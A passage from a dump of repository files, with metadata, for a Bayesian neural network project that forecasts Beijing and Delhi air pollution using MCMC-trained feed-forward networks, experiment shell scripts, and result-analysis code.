"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n\npython3 summarise_data.py ../data/Beijing/data.csv > Beijing_data_summary.tex\n\n\n\n"
},
{
"alpha_fraction": 0.6867470145225525,
"alphanum_fraction": 0.759036123752594,
"avg_line_length": 25.66666603088379,
"blob_id": "1d4421d4bd70c1d6791caa4f3b746aa88c6e54a5",
"content_id": "a056847344273fb353514d77af5df891393c6b6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 83,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 3,
"path": "/data/Beijing/process.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "\npython process_1_hour.py \npython process_24_hour.py \npython process_168_hour.py \n\n"
},
{
"alpha_fraction": 0.6911764740943909,
"alphanum_fraction": 0.6911764740943909,
"avg_line_length": 12.199999809265137,
"blob_id": "ee8c60fe43f6a98dc77952b94e7d94ed79e199b3",
"content_id": "0ded05f28150d3e22194f62abe54751385fc726f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 68,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 5,
"path": "/RUN_TESTS.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n./TEST_TRANSFORM_SCRIPT.sh\n\n./TEST_ANALYSE_SCRIPT.sh\n\n\n"
},
{
"alpha_fraction": 0.4470662474632263,
"alphanum_fraction": 0.45463722944259644,
"avg_line_length": 41.8270263671875,
"blob_id": "277734e9cd9cb7c3ca003db013a46042bafe576b",
"content_id": "ad53911f17c4a1dc44d4ddb3871699ae553a06fe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7925,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 185,
"path": "/src/FFNN.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport random\nimport time\nimport math\nfrom NeuralNetwork import NeuralNetwork\n\n#-------------------------------------------------------------------------------\n# A STANDARD FEED FORWARD NEURAL NETWORK CLASS\n# WITH THE METHODS THAT MAKE IT AMENABLE TO BAYESIAN ML PROCESSES\n#-------------------------------------------------------------------------------\nclass FFNN(NeuralNetwork):\n\n def __init__(self, input, hidden, output, output_act, eval_metric):\n\n self.hidden = hidden\n NeuralNetwork.__init__(self, input, output, output_act, eval_metric) \n\n self.w_size = self.get_weight_vector_length()\n\n self.initialise_cache()\n\n self.W1 = np.random.randn(self.input, self.hidden) / np.sqrt(self.input)\n self.B1 = np.random.randn(1, self.hidden) / np.sqrt(self.hidden) # bias first layer\n self.W2 = np.random.randn(self.hidden, self.output) / np.sqrt(self.hidden)\n self.B2 = np.random.randn(1, self.output) / np.sqrt(self.hidden) # bias second layer\n\n self.hidout = np.zeros((1, self.hidden)) # output of first hidden layer\n self.out = np.zeros((1, self.output)) # output layer for base model\n\n self.final_out = np.zeros((1, self.output)) # Final output for the model\n\n ######################################################################\n # PRINT THE ARCHITECTURE\n ######################################################################\n def print(self):\n print(\"Bayesian FEED FORWARD Neural Network\")\n print(\"Input Nodes:\", self.input)\n print(\"Hidden Nodes:\", self.hidden)\n print(\"Output Nodes:\", self.output)\n\n\n ######################################################################\n # PASS DATA X THROUGH THE NETWORK TO PRODUCE AN OUTPUT\n ######################################################################\n def forward_pass(self, X):\n z1 = X.dot(self.W1) - self.B1\n self.hidout = self.relu(z1) # output of first hidden layer\n z2 = self.hidout.dot(self.W2) - self.B2\n self.out = self.activation(z2)\n self.final_out = self.out\n return self.final_out\n\n\n ######################################################################\n # TAKE A SINGLE VECTOR OF FLOATING POINT NUMBERS AND USE IT TO \n # SET THE VALUES OF ALL WEIGHTS AND BIASES\n ######################################################################\n def decode(self, w):\n input_layer_wts = self.input * self.hidden\n output_layer_wts = self.hidden * self.output\n\n start_index = 0\n w_layer1 = w[start_index:input_layer_wts]\n self.W1 = np.reshape(w_layer1, (self.input, self.hidden))\n start_index = start_index + input_layer_wts\n\n self.B1 = w[start_index:start_index + self.hidden]\n start_index = start_index + self.hidden\n\n w_layer2 = w[start_index: start_index + output_layer_wts]\n self.W2 = np.reshape(w_layer2, (self.hidden, self.output))\n start_index = start_index + output_layer_wts\n\n self.B2 = w[start_index:start_index + self.output]\n start_index = start_index + self.output\n\n ######################################################################\n # ENCODE THE WEIGHTS AND BIASES INTO A SINGLE VECTOR \n ######################################################################\n def encode(self):\n w1 = self.W1.ravel()\n w2 = self.W2.ravel()\n w = np.concatenate([w1, self.B1, w2, self.B2])\n return w\n\n ######################################################################\n # PROCESS DATA\n # RUN A NUMBER OF EXAMPLES THROUGH THE NETWORK AND RETURN PREDICTIONS\n ######################################################################\n def process_data(self, data): \n size = data.shape[0]\n Input = np.zeros((1, self.input)) # temp hold input\n Desired = np.zeros((1, self.output))\n fx = np.zeros(size)\n for pat in range(0, size):\n Input[:] = data[pat, 0:self.input]\n Desired[:] = data[pat, self.input:]\n self.forward_pass(Input)\n fx[pat] = self.final_out\n return fx\n\n\n ######################################################################\n # EVALUATE PROPOSAL \n # THIS METHOD NEEDS TO SET THE WEIGHT PARAMETERS\n # THEN PASS THE SET OF DATA THROUGH, COLLECTING THE OUTPUT FROM EACH\n # OF THE BOOSTED LAYERS, AND THE FINAL OUTPUT\n ######################################################################\n def evaluate_proposal(self, data, w):\n self.decode(w)\n fx = self.process_data(data)\n y = data[:, self.input]\n feats = data[:, :self.input]\n metric = self.eval(fx, y, feats)\n return [fx, metric]\n\n ######################################################################\n # LOG LIKELIHOOD\n # CALCULATED GIVEN \n # - A PROPOSED SET OF WEIGHTS\n # - A DATA SET \n # - AND THE PARAMETERS FOR THE ERROR DISTRIBUTION\n ######################################################################\n def log_likelihood(self, data, w, tausq):\n y = data[:, self.input]\n [fx, rmse] = self.evaluate_proposal(data, w)\n loss = -0.5 * np.log(2 * math.pi * tausq) - 0.5 * np.square(y - fx) / tausq\n return np.sum(loss)\n\n\n ######################################################################\n # LOG PRIOR\n ######################################################################\n def log_prior(self, w, tausq):\n h = self.hidden # number hidden neurons\n d = self.input # number input neurons\n part1 = -1 * ((d * h + h + 2) / 2) * np.log(self.sigma_squared)\n part2 = 1 / (2 * self.sigma_squared) * (sum(np.square(w)))\n logp = part1 - part2 - (1 + self.nu_1) * np.log(tausq) - (self.nu_2 / tausq)\n return logp\n\n\n ######################################################################\n # GET THE COMPLETE LENGTH OF THE ENCODED WEIGHT VECTOR\n ######################################################################\n def get_weight_vector_length(self):\n start_index = 0\n input_layer_wts = self.input * self.hidden\n output_layer_wts = self.hidden * self.output\n boost_layer_wts = self.hidden * self.hidden\n start_index = start_index + input_layer_wts\n start_index = start_index + self.hidden\n start_index = start_index + output_layer_wts\n start_index = start_index + self.output\n return start_index\n\n\n ######################################################################\n # GET NEW PROPOSAL WEIGHT VECTOR BY MODIFYING AN EXISTING ONE\n ######################################################################\n def get_proposal_weight_vector(self, w):\n w_proposal = w + np.random.normal(0, self.step_w, self.w_size)\n return w_proposal\n\n ######################################################################\n # GET PROPOSAL TAU VALUE FOR ERROR DISTRIBUTION \n ######################################################################\n def get_proposal_tau(self, eta):\n eta_pro = eta + np.random.normal(0, self.step_eta, 1)\n tau_pro = math.exp(eta_pro)\n return [eta_pro, tau_pro]\n\n\n ######################################################################\n # ACCEPTANCE PROBABILITY - METROPOLIS HASTINGS\n ######################################################################\n def get_acceptance_probability(self, new_w, new_tausq, old_w, old_tausq, data ):\n return self.calculate_metropolis_hastings_acceptance_probability(new_w, new_tausq, old_w, old_tausq, data)\n\n ######################################################################\n # GET THE WEIGHT VECTOR\n ######################################################################\n def get_weight_vector(self):\n mytemp = [get_weight_vector_length()]\n return mytemp\n\n\n"
},
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.7668997645378113,
"avg_line_length": 76.90908813476562,
"blob_id": "f88a62d35c0e42f1328514b5ead1e213cceaf188",
"content_id": "88e91794c2e185f49dc8edd36e6a7a9c27d3c2b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 858,
"license_type": "no_license",
"max_line_length": 315,
"num_lines": 11,
"path": "/experiments/RUN_BeiJing_7day_FFNN_H15.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ncd ../\n\npython3 ./train_bn_mcmc.py 28 15 1 0 FFNN sigmoid data/Beijing/sets/Train_168_hour_norm.csv data/Beijing/sets/Test_168_hour_norm.csv results/Beijing_FFNN_H15_7day_Sigmoid/ MASE 100000\n\n# PROCESS THE RESULTS SO THAT THEY ARE IN THE TARGET SPACE (DEAL WITH NORMALISED OR DIFFERENCED TARGETS)\n\npython3 ./transform_test_results.py \"./results/Beijing_FFNN_H15_7day_Sigmoid/test_predictions_final.tsv\" \"./results/Beijing_FFNN_H15_7day_Sigmoid/test_predictions.tsv\" \"./data/Beijing/sets/Test_168_hour_full.csv\" \"data/Beijing/sets/Target_168_nzr_config.yaml\" True False False False \"TARGET_pm2.5_168_VALUE\" \"pm2.5\"\n\npython3 analyse_test_results.py \"./results/Beijing_FFNN_H15_7day_Sigmoid\" \"./results/Beijing_FFNN_H15_7day_Sigmoid/test_predictions_final.tsv\" \"./data/Beijing/sets/Test_168_hour_full.csv\" 50000 \"TARGET_pm2.5_168_VALUE\" \"pm2.5\"\n\n"
},
{
"alpha_fraction": 0.667560338973999,
"alphanum_fraction": 0.7667560577392578,
"avg_line_length": 64.79412078857422,
"blob_id": "5a2335403599de26a4576b744478a6f4d3fe048a",
"content_id": "53b93fabf35dd0c8b812ca4abee8ab589c487443",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2238,
"license_type": "no_license",
"max_line_length": 296,
"num_lines": 34,
"path": "/experiments/RUN_Delhi_LangevinFFNN.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n \ncd ../\n\n# Station 144\n# Delhi Air Quality\n\npython3 ./train_bn_mcmc.py 20 5 1 0 LangevinFFNN sigmoid data/Delhi/STN_144/train_normalised.csv data/Delhi/STN_144/test_normalised.csv results/Delhi_144_LvnFFNN_Sigmoid/ MASE 100000\n\npython3 ./transform_test_results.py \"./results/Delhi_144_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./results/Delhi_144_LvnFFNN_Sigmoid/test_predictions.tsv\" \"./data/Delhi/STN_144/test.csv\" \"data/Delhi/STN_144/nzr_config.yaml\" True False False False \"TARGET_STN_144_PM10_7_VALUE\" \"STN_144_PM10\"\n\npython3 analyse_test_results.py \"./results/Delhi_144_LvnFFNN_Sigmoid\" \"./results/Delhi_144_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./data/Delhi/STN_144/test.csv\" 50000 \"TARGET_STN_144_PM10_7_VALUE\" \"STN_144_PM10\"\n\n\n# Station 146\n# Delhi Air Quality\n\npython3 ./train_bn_mcmc.py 20 5 1 0 LangevinFFNN sigmoid data/Delhi/STN_146/train_normalised.csv data/Delhi/STN_146/test_normalised.csv results/Delhi_146_LvnFFNN_Sigmoid/ MASE 100000\n\npython3 ./transform_test_results.py \"./results/Delhi_146_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./results/Delhi_146_LvnFFNN_Sigmoid/test_predictions.tsv\" \"./data/Delhi/STN_146/test.csv\" \"data/Delhi/STN_146/nzr_config.yaml\" True False False False \"TARGET_STN_146_PM10_7_VALUE\" \"STN_146_PM10\"\n\npython3 analyse_test_results.py \"./results/Delhi_146_LvnFFNN_Sigmoid\" \"./results/Delhi_146_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./data/Delhi/STN_146/test.csv\" 50000 \"TARGET_STN_146_PM10_7_VALUE\" \"STN_146_PM10\"\n\n\n\n\n# Station 345\n# Delhi Air Quality\n\npython3 ./train_bn_mcmc.py 20 5 1 0 LangevinFFNN sigmoid data/Delhi/STN_345/train_normalised.csv data/Delhi/STN_345/test_normalised.csv results/Delhi_345_LvnFFNN_Sigmoid/ MASE 100000\n\npython3 ./transform_test_results.py \"./results/Delhi_345_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./results/Delhi_345_LvnFFNN_Sigmoid/test_predictions.tsv\" \"./data/Delhi/STN_345/test.csv\" \"data/Delhi/STN_345/nzr_config.yaml\" True False False False \"TARGET_STN_345_PM10_7_VALUE\" \"STN_345_PM10\"\n\npython3 analyse_test_results.py \"./results/Delhi_345_LvnFFNN_Sigmoid\" \"./results/Delhi_345_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./data/Delhi/STN_345/test.csv\" 50000 \"TARGET_STN_345_PM10_7_VALUE\" \"STN_345_PM10\"\n\n"
},
{
"alpha_fraction": 0.6286057829856873,
"alphanum_fraction": 0.6673678159713745,
"avg_line_length": 33.278350830078125,
"blob_id": "84dca0ecec3e752b3d4842235fd157a016f81a65",
"content_id": "46be21cd024322228f1d348aa6a0589e1472b680",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3328,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 97,
"path": "/src/Theano_Bayesian_NN.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import pymc3 as pm\nimport theano.tensor as T\nimport theano\nimport sklearn\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.preprocessing import scale\nfrom sklearn.cross_validation import train_test_split\n\nimport matplotlib.pyplot as plt\n\nX, Y = datasets.make_blobs(n_samples=200, n_features=2, centers=2, cluster_std=3.0, \n center_box=(-5.0, 5.0), shuffle=True, random_state=None)\n\nX = scale(X)\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=.5)\n\n\nplt.scatter(X[Y==0, 0], X[Y==0, 1])\nplt.scatter(X[Y==1, 0], X[Y==1, 1], color='r')\n\nplt.show()\n\n# Turn inputs and outputs into shared variables so that we can change them later\nann_input = theano.shared(X_train)\nann_output = theano.shared(Y_train)\n\nwith pm.Model() as model:\n # Below we require an ordering of the summed weights, thus initialize in this order\n init_1 = np.random.randn(X.shape[1], 3)\n init_1 = init_1[:, np.argsort(init_1.sum(axis=0))]\n init_2 = np.random.randn(3)\n init_2 = init_2[np.argsort(init_2)]\n # Weights from input to hidden layer\n weights_in_1 = pm.Normal('w_in_1', 0, sd=1, shape=(X.shape[1], 3), testval=init_1)\n # Weights from hidden layer to output\n weights_1_out = pm.Normal('w_1_out', 0, sd=1, shape=(3,), testval=init_2)\n # As the hidden neurons are interchangeable this induces a symmetry in the posterior.\n # This is my first attempt at breaking that symmetry. I'm not sure if it's actually\n # correct or if there is a better way to do it. It seems to work for this toy model.\n pm.Potential('order_means_potential',\n T.switch(T.ge(T.sum(weights_in_1[:, 0]), T.sum(weights_in_1[:, 1])), -np.inf, 0)\n + T.switch(T.ge(T.sum(weights_in_1[:, 1]), T.sum(weights_in_1[:, 2])), -np.inf, 0))\n # Not sure if this is required...\n pm.Potential('order_means_potential2',\n T.switch(T.ge(weights_1_out[0], weights_1_out[1]), -np.inf, 0)\n + T.switch(T.ge(weights_1_out[1], weights_1_out[2]), -np.inf, 0))\n # Do forward pass\n a1 = T.dot(ann_input, weights_in_1)\n act_1 = T.nnet.sigmoid(a1)\n act_out = T.dot(act_1, weights_1_out)\n out = pm.Bernoulli('out', T.nnet.sigmoid(act_out), observed=ann_output)\n step = pm.Metropolis()\n trace = pm.sample(50000, step=step)\n\npm.traceplot(trace)\n\n\n\n\n# Replace shared variables with testing set\n# (note that using this trick we could be streaming ADVI for big data)\nann_input.set_value(X_test)\nann_output.set_value(Y_test)\n\n# Creater posterior predictive samples\nppc = pm.sample_ppc(trace, model=model, samples=500)\npred = ppc['out'].mean(axis=0) > 0.5\n\n\n\nplt.scatter(X_test[pred==0, 0], X_test[pred==0, 1])\nplt.scatter(X_test[pred==1, 0], X_test[pred==1, 1], color='r')\nplt.title('Predicted labels in testing set')\n\n\n\nprint('Accuracy = {}%'.format((Y_test == pred).mean() * 100))\n\n\nimport seaborn as sns\nsns.regplot(ppc['out'].mean(axis=0), Y_test, logistic=True)\n\ngrid = np.mgrid[-3:3:100j,-3:3:100j]\ngrid_2d = grid.reshape(2, -1).T\ndummy_out = np.ones(grid.shape[1], dtype=np.int8)\n\nann_input.set_value(grid_2d)\nann_output.set_value(dummy_out)\n# Creater posterior predictive samples\nppc = pm.sample_ppc(trace, model=model, samples=500)\npred = ppc['out'].mean(axis=0)\n\nsns.heatmap(pred.reshape(100, 100).T)\n\n\nsns.heatmap(ppc['out'].std(axis=0).reshape(100, 100).T)\n\n\n\n"
},
{
"alpha_fraction": 0.6547868847846985,
"alphanum_fraction": 0.688329815864563,
"avg_line_length": 28.14285659790039,
"blob_id": "c9d07df6092f47c952b6f44cdaea2133c32c998e",
"content_id": "b53a62f662ae73554938b279d4b7db99c4586730",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1431,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 49,
"path": "/TEST_ANALYSE_SCRIPT.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# THESE SIMPLE TESTS ENSURE THAT THE ANALYSIS OF RESULTS SCRIPTS FUNCTION AS EXPECTED\n\n\npython analyse_test_results.py \"tests/Test_01/\" \"tests/Test_01/test_predictions.tsv\" \"tests/Test_01/test_data.csv\" 2 target_value current_value\n\npython analyse_test_results.py \"tests/Test_05/\" \"tests/Test_05/test_predictions.tsv\" \"tests/Test_05/test_data.csv\" 2 target_value current_value\n\npython analyse_test_results.py \"tests/Test_06/\" \"tests/Test_06/test_predictions.tsv\" \"tests/Test_06/test_data.csv\" 2 target_value current_value\n\npython analyse_test_results.py \"tests/Test_07/\" \"tests/Test_07/test_predictions.tsv\" \"tests/Test_07/test_data.csv\" 2 target_value current_value\n\nFAILED=\"False\"\n\nDIFF=\"$(diff \"./tests/Test_01/testdata_performance.csv\" \"./tests/Test_01/benchmark.csv\")\"\nif [ \"$DIFF\" != \"\" ] \nthen\n echo \"TEST 1 FAILED\"\n FAILED='True'\nfi\n\n\nDIFF=\"$(diff \"./tests/Test_05/testdata_performance.csv\" \"./tests/Test_05/benchmark.csv\")\"\nif [ \"$DIFF\" != \"\" ]\nthen\n echo \"TEST 5 FAILED\"\n FAILED='True'\nfi\n\nDIFF=\"$(diff \"./tests/Test_06/testdata_performance.csv\" \"./tests/Test_06/benchmark.csv\")\"\nif [ \"$DIFF\" != \"\" ]\nthen\n echo \"TEST 6 FAILED\"\n FAILED='True'\nfi\n\nDIFF=\"$(diff \"./tests/Test_07/testdata_performance.csv\" \"./tests/Test_07/benchmark.csv\")\"\nif [ \"$DIFF\" != \"\" ]\nthen\n echo \"TEST 7 FAILED\"\n FAILED='True'\nfi\n\n\nif [ \"$FAILED\" == \"False\" ]\nthen\n echo \"ALL ANALYSE TESTS PASSED\"\nfi\n \n\n"
},
{
"alpha_fraction": 0.4979363679885864,
"alphanum_fraction": 0.530422031879425,
"avg_line_length": 42.410404205322266,
"blob_id": "24c83c69db89acb685fde536a7965509669e6597",
"content_id": "f44b85a71d274620fcc710a875623903372082a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7511,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 173,
"path": "/analyse_test_results.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport random\nimport time\nimport sys\nimport os\nimport yaml\n\nsys.path.append('../Dataset_Transformers')\nfrom transform import Normalizer as nzr\n\n\n#################################################################################\n#\n# ANALYSE THE RESULTS OF TEST PREDICTIONS FOR A BAYESIAN MODEL \n#\n# WE WANT TO CREATE THE MEAN AND QUANTILE PREDICTIONS FROM THE RAW MODEL OUTPUTS\n# AND THEN SUMMARISE THIS TO INDCATE HOW WELL CALIBRATED THE MODEL IS AND HOW\n# WELL THE MEAN PERFORMS AS AN ESTIMATOR.\n#\n# PARAMETERS\n# - PATH TO RESULTS: DIRECTORY IN WHICH TO WRITE RESULTS\n# - PATH TO TEST RESULT: THE PREDICTIONS MADE ON THE TEST DATA\n# - PATH TO TESTING DATA: PATH TO THE ORIGINAL UN-NORMALISED TEST DATA\n# - BURNIN: INTEGER\n# - TARGET_COL_NAME: COLUMN NAME OF FOR PREDICTION TARGET\n# - NAIVE_COL_NAME: CALCULATING MASE\n#\n#################################################################################\n\ndef main():\n if len(sys.argv) < 6:\n print(\"ERROR: MISSING ARGUMENTS\")\n print_usage(sys.argv)\n exit(1)\n else:\n result_path = sys.argv[1]\n result_file_path = sys.argv[2]\n test_data_path = sys.argv[3]\n burnin = sys.argv[4]\n target_col = sys.argv[5]\n ref_col = sys.argv[6]\n \n test_data = pd.read_csv(test_data_path, sep=\",\")\n test_preds = np.loadtxt(result_file_path)\n print( test_preds.shape )\n\n data_with_preds = add_mean_and_quantiles( test_data, test_preds, burnin )\n\n # NOW WE ARE READY TO PRODUCE SUMMARY AND PLOTS\n write_prediction_intervals_file( data_with_preds, target_col, result_path )\n summarise_model_calibration( data_with_preds, target_col, result_path )\n summarise_model_performance( data_with_preds, target_col, result_path, ref_col )\n\n\n#################################################################################\n# USAGE\n#################################################################################\ndef print_usage(args):\n print(\"USAGE \")\n print(args[0], \"<RESULTS DIR> <RESULTS FILE> <TEST DATA PATH> <BURNIN> <TARGET COL> <NAIVE COL>\")\n\n\n\n#################################################################################\n# ADDING PREDICTINGS AND QUANTILE BANDS \n#################################################################################\ndef add_mean_and_quantiles( test_data, test_preds, burnin ) :\n rez = test_data.copy()\n tested = test_preds[int(burnin):, ]\n rez['mu'] = tested.mean(axis=0)\n rez['qnt_99'] = np.percentile(tested, 99, axis=0)\n rez['qnt_95'] = np.percentile(tested, 95, axis=0)\n rez['qnt_90'] = np.percentile(tested, 90, axis=0)\n rez['qnt_80'] = np.percentile(tested, 80, axis=0)\n rez['qnt_20'] = np.percentile(tested, 20, axis=0)\n rez['qnt_10'] = np.percentile(tested, 10, axis=0)\n rez['qnt_5'] = np.percentile(tested, 5, axis=0)\n rez['qnt_1'] = np.percentile(tested, 1, axis=0) \n return rez\n\n\n#################################################################################\n# WRITE OUT THE TRUE VALUES AND PREDICTION INTERVALS FILE\n#################################################################################\ndef write_prediction_intervals_file( test_data, target_field_name, results_path ) :\n\n data = {'y':test_data[target_field_name], \n 'qnt_1':test_data['qnt_1'], \n 'qnt_5':test_data['qnt_5'], \n 'qnt_10':test_data['qnt_10'], \n 'qnt_20':test_data['qnt_20'], \n 'mu': test_data['mu'], \n 'qnt_80':test_data['qnt_80'], \n 'qnt_90':test_data['qnt_90'], \n 'qnt_95':test_data['qnt_95'], \n 'qnt_99':test_data['qnt_99'] }\n df = pd.DataFrame(data)\n df.to_csv(results_path + '/testdata_prediction_intervals.csv', index=False)\n\n\n#################################################################################\n# CALCULATE SUMMARY STATISTICS ABOUT THE CALIBRATION OF THE MODEL\n#################################################################################\ndef summarise_model_calibration( test_data, target_name, results_path ):\n df = test_data.copy() \n df[\"in_98_window\"] = np.where( (df[target_name]>df['qnt_1']) & (df[target_name]<df['qnt_99']), 1, 0 )\n df[\"in_90_window\"] = np.where( (df[target_name]>df['qnt_5']) & (df[target_name]<df['qnt_95']), 1, 0 )\n df[\"in_80_window\"] = np.where( (df[target_name]>df['qnt_10']) & (df[target_name]<df['qnt_90']), 1, 0 )\n df[\"in_60_window\"] = np.where( (df[target_name]>df['qnt_20']) & (df[target_name]<df['qnt_80']), 1, 0 )\n df[\"window_size_98\"] = df['qnt_99'] - df['qnt_1']\n df[\"window_size_90\"] = df['qnt_95'] - df['qnt_5']\n df[\"window_size_80\"] = df['qnt_90'] - df['qnt_10']\n df[\"window_size_60\"] = df['qnt_80'] - df['qnt_20']\n\n in_98_window = df[\"in_98_window\"].mean()\n in_90_window = df[\"in_90_window\"].mean()\n in_80_window = df[\"in_80_window\"].mean()\n in_60_window = df[\"in_60_window\"].mean()\n max_window_size_98 = df[\"window_size_98\"].max()\n mean_window_size_98 = df[\"window_size_98\"].mean()\n min_window_size_98 = df[\"window_size_98\"].min()\n\n max_window_size_90 = df[\"window_size_90\"].max()\n mean_window_size_90 = df[\"window_size_90\"].mean()\n min_window_size_90 = df[\"window_size_90\"].min()\n max_window_size_80 = df[\"window_size_80\"].max()\n mean_window_size_80 = df[\"window_size_80\"].mean()\n min_window_size_80 = df[\"window_size_80\"].min()\n\n max_window_size_60 = df[\"window_size_60\"].max()\n mean_window_size_60 = df[\"window_size_60\"].mean()\n min_window_size_60 = df[\"window_size_60\"].min()\n\n sum_data = { 'window': [98,90,80,60],\n 'calibration':[in_98_window,in_90_window,in_80_window,in_60_window],\n 'min_size':[min_window_size_98,min_window_size_90,min_window_size_80,min_window_size_60],\n 'mean_size':[mean_window_size_98,mean_window_size_90,mean_window_size_80,mean_window_size_60],\n 'max_size':[max_window_size_98,max_window_size_90,max_window_size_80,max_window_size_60] }\n sum_df = pd.DataFrame(sum_data)\n sum_df.to_csv(results_path + '/testdata_calibration.csv', index=False)\n\n\n#################################################################################\n# CALCULATE PERFORMANCE STATISTICS OF THE MODEL\n#################################################################################\ndef summarise_model_performance( test_data, target_name, results_path, naive_col='' ):\n df = test_data.copy()\n df[\"base_error\"] = df['mu'] - df[target_name]\n df[\"nominal_target\"] = np.where(df[target_name]==0, 0.000001, df[target_name])\n df[\"abs_percent_error\"] = abs(100*df[\"base_error\"]/df[\"nominal_target\"])\n df[\"abs_error\"] = abs(df[\"base_error\"])\n df[\"naive_error\"] = df[naive_col] - df[target_name]\n df[\"abs_naive_error\"] = abs( df[\"naive_error\"] )\n df[\"abs_percent_error_naive\"] = abs(100*df[\"naive_error\"]/df[\"nominal_target\"])\n sum_data = {\n 'MAE': [ df[\"abs_error\"].mean() ],\n 'MAPE': [ df[\"abs_percent_error\"].mean() ],\n 'MASE': [ df[\"abs_error\"].sum() / df[\"abs_naive_error\"].sum() ],\n 'MAE Naive': [ df[\"abs_naive_error\"].mean() ],\n 'MAPE Naive': [ df[\"abs_percent_error_naive\"].mean() ]\n }\n sum_df = pd.DataFrame(sum_data)\n sum_df.to_csv(results_path + '/testdata_performance.csv', index=False)\n\n\n\n\n\nif __name__ == \"__main__\": main()\n\n"
},
{
"alpha_fraction": 0.595198392868042,
"alphanum_fraction": 0.6145381927490234,
"avg_line_length": 40.05479431152344,
"blob_id": "72432690f929573691a854760bf2e66eafd9ac32",
"content_id": "37c722c68c1b7b49f4275558b5801e684a352e7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2999,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 73,
"path": "/data/Delhi/generate_train_test_sets.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport sys\nimport os\n\nsys.path.append('../../../Dataset_Transformers')\n\nfrom transform import DatasetGenerator as dg\nfrom transform import Normalizer as nzr\n\ndf = pd.read_csv('delhi_pm10_all_stations_wide.csv')\n\nindex_column = \"No\"\nforecast_period = 7\nlist_of_lags = [7,14,21]\n\ncut_off_date = '2015-01-01'\n\n# NEED TO ADD THE INDEX COLUMN\ndf[index_column] = range( 0, len(df) )\n\n# FUNCTIONS\n#################################################################################\ndef ensure_dir(results_dir):\n directory = os.path.abspath(results_dir)\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef generate_files_for_station(stat, index_column, cut_off_date, forecast_period, list_of_lags):\n folder = 'STN_%s' % str(stat)\n ensure_dir(folder)\n forecast_column = 'STN_%s_PM10' % str(stat)\n new_df = dg.generate_time_dependent_features( df, index_column, forecast_column, forecast_period, list_of_lags)\n train_df = new_df[ new_df['Date']<cut_off_date ]\n test_df = new_df[ new_df['Date']>=cut_off_date ]\n # ###########################################################################################################\n # REMOVE UNWANTED COLUMNS, NORMALISE AND WRITE TO DISK\n # -- WE REMOVE THE DIFF VERSION OF THE TARGET \n # AS IN THIS PROBLEM DATA IS GENERALLY STATIONARY (IT DOES NOT EXHIBIT OVERALL TREND)\n # ###########################################################################################################\n features = train_df.columns.tolist()\n\n val_name = 'STN_%s_PM10' % str(stat)\n targ1_name = 'TARGET_STN_%s_PM10_7_VALUE' % str(stat)\n targ2_name = 'TARGET_STN_%s_PM10_7_DIFF' % str(stat)\n targ3_name = 'TARGET_STN_%s_PM10_7_PROP_DIFF' % str(stat)\n unwanted = ['No', 'Date', val_name, targ1_name, targ2_name, targ3_name]\n\n for x in unwanted : \n features.remove(x)\n features.append(val_name)\n features.append(targ1_name)\n # WRITE OUT THE UN-NORMALISED VERSION\n train_df2 = train_df.loc[:, features]\n test_df2 = test_df.loc[:, features] \n train_df2.to_csv(folder+'/train.csv', encoding='utf-8', index=False, header=True)\n test_df2.to_csv(folder+'/test.csv', encoding='utf-8', index=False, header=True)\n\n config = nzr.create_normalization_config(train_df2)\n nzr.write_field_config(config, targ1_name, folder+'/nzr_config.yaml')\n\n train_df_norm = nzr.normalize(train_df2, config, [])\n test_df_norm = nzr.normalize(test_df2, config, [])\n\n train_df_norm.to_csv(folder+'/train_normalised.csv', sep=' ', encoding='utf-8', index=False, header=False)\n test_df_norm.to_csv(folder+'/test_normalised.csv', sep=' ', encoding='utf-8', index=False, header=False)\n\n\n\ngenerate_files_for_station(144, index_column, 